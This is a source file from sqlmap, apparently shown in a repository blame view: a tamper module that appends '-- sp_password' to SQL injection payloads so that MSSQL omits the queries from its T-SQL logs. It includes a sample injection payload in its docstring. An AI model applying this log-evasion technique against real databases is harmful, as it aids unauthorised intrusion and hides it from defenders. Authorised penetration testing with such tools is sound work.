sqlmap/tamper/sp_password.py

33 lines
807 B
Python
Raw Normal View History

#!/usr/bin/env python
2012-07-06 14:24:55 +04:00
"""
2017-01-02 16:19:18 +03:00
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
2017-10-11 15:50:46 +03:00
See the file 'LICENSE' for copying permission
2012-07-06 14:24:55 +04:00
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGH
2012-12-03 17:27:01 +04:00
def tamper(payload, **kwargs):
2012-07-06 14:24:55 +04:00
"""
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
Requirement:
* MSSQL
Notes:
* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure
* Reference: http://websec.ca/kb/sql_injection
>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
2012-07-06 14:24:55 +04:00
"""
retVal = ""
if payload:
retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "")
return retVal